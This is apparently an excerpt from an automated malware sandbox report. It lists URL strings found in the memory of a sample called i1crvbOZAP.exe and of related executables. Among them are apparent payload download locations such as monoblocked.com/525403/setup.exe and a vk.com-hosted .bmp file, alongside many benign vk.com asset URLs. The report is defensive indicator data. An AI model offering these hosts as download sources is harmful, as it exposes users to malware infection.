Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1726047377.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe/gyhu
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeC:
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exexe
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/9
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1726047377.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1727907972.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1726047377.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exei
Source: i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://myvidoop.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://papi.vk.com/pushsse/ruim
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://platform.twitter.com
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CD1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1779272376.0000029625BCE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623CD5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://psv4.userapi.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CD1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623CD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://psv4.userapi.com/T
Source: i1crvbOZAP.exe, 00000000.00000003.1785996128.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1792316388.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://psv4.userapi.com/c236331/u329118071/docs/d4/678b61126bd7/
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625A9E000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1779272376.0000029625BE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://psv4.userapi.com/c236331/u329118071/docs/d4/678b61126bd7/02.bmp?extra=u4x5o5e99u4NPac3pUrfyS
Source: i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://psv4.userapi.com/i
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r.mradx.net
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.p
Source: i1crvbOZAP.exe, 00000000.00000003.1684844522.0000029625BF2000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com
Source: i1crvbOZAP.exe, 00000000.00000003.1728465989.0000029629F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/base.7c74f023.css
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/common.ba3d2f6f.css
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_cnt.c7a76efe.css
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/ui_common.eebaf9c8.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/uncommon.6d51982c.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/vk_sans_display.5625d45f.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/vk_sans_display_faux.7d208ecb.css
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/vkui.43318ab6.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/canvas_to_blob.f2c43988.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/audioplayer-lib.2b49d504.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/audioplayer-lib.93b52d88.css
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/common.a2774248.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/palette.361d379a.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/palette.f6338478.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/polyfills.8051ea23.js
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/react.f8231ef2.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/state-management.c22f9f68.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/vkcom-kit-icons.7c792f59.js
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/vkcom-kit.
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/vkcom-kit.2afa9163.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/vkcom-kit.8c1d65c3.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/chunks/vkui.18eb14e6.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/common_web.4b623ab6.css
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/common_web.e6229a14.js
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/cookie_manager.17fb256d.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/css_types.1bff1a5b.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/docs.043e7b59.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/docs.20074c02.css
Source: i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/element_functions.0910a5f2.js
Source: i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/dist/web/grip.0b3b493f.js
